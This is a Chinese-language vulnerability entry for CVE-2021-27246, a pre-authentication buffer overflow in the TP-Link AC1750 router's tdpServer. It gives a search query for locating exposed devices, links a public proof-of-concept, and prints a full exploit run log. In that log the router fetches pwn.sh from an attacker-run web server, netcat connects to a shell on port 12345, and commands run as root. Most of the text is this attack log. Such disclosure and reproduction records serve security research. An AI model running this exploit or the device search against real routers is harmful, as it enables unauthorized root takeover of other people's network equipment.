# TP-Link AC1750 预认证远程代码执行漏洞CVE-2021-27246 ## 漏洞描述 在TP-Link AC1750的tdpServer守护程序中存在漏洞,没有检查json数据的大小,导致了缓冲区溢出,通过缓冲区溢出,可以导致代码执行。 参考阅读: - https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html ## 网络测绘 ``` app="TP_LINK-AC1750" ``` ## 漏洞复现 - poc:https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020 ``` $ bash exploit.sh [+] Launching web server for distribution of pwn.sh Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... INFO:tdpwn:Associating 49 onemesh clients... INFO:tdpwn:Done! And wait for 80 seconds... 80 seconds left... 70 seconds left... 60 seconds left... 50 seconds left... 40 seconds left... 30 seconds left... 20 seconds left... 10 seconds left... [+] Trying to exploit the tddp injection INFO:tdp:Preparing tddpv1_configset payload INFO:tdp:Sending payload [+] Trying the root shell (Low probability of success...) nc -v 192.168.0.1 12345 nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused [ ] If shell hasn't succeed, don't worry, we retry INFO:tdpwn:Associating 49 onemesh clients... INFO:tdpwn:Done! And wait for 80 seconds... 80 seconds left... 70 seconds left... 60 seconds left... 50 seconds left... 40 seconds left... 30 seconds left... 20 seconds left... 10 seconds left... [+] Trying to exploit the tddp injection INFO:tdp:Preparing tddpv1_configset payload INFO:tdp:Sending payload 192.168.0.1 - - [30/Nov/2020 12:10:59] "GET /pwn.sh HTTP/1.1" 200 - [+] Trying the root shell (High probability of success...) nc -v 192.168.0.1 12345 Connection to 192.168.0.1 12345 port [tcp/*] succeeded! uname -a Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux id uid=0(root) gid=0(root) ^C[-] Stopping Webserver, now Terminated ```